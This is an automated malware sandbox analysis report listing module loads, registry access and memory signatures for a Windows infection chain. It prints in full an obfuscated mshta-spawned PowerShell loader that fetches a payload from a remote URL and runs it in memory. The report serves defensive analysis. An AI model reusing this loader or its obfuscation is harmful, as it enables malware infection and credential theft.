Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: actxprxy.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: cryptdlg.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msoert2.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msftedit.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe File opened: C:\Windows\SysWOW64\msftedit.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbY source: powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Core.pdb source: powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2389835741.00000000079F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2389835741.00000000079F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000005.00000002.2389835741.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: newfile.exe, 0000000A.00000000.2479023272.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe, 0000000C.00000000.2575308880.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe.8.dr
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2396600262.0000000008A3B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdb source: newfile.exe, newfile.exe, 0000000A.00000000.2479023272.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe, 0000000C.00000000.2575308880.0000000000C31000.00000020.00000001.01000000.0000000F.sdmp, newfile.exe.8.dr

Data Obfuscation

barindex
Source: Yara match File source: 00000005.00000002.2398566849.00000000095CD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3244639654.0000000003FED000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2397231335.0000000008C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2442017954.000000000568E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2385835315.000000000603F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Roisters)$global:kofferdams = [System.Text.Encoding]::ASCII.GetString($Unharmfully)$global:Ciscoes=$kofferdams.substring(298964,29366)<#handelsrestriktioner Outsize Bubastos #>$Merce
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Driftskontrollerne $Skulptrerne $Teindable), (Saalegngerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Upstater = [AppDomain]::CurrentDomain.GetAssembl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Auriculoventricular)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Leatherer, $false).DefineType($Somniv
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Roisters)$global:kofferdams = [System.Text.Encoding]::ASCII.GetString($Unharmfully)$global:Ciscoes=$kofferdams.substring(298964,29366)<#handelsrestriktioner Outsize Bubastos #>$Merce
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsp
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe 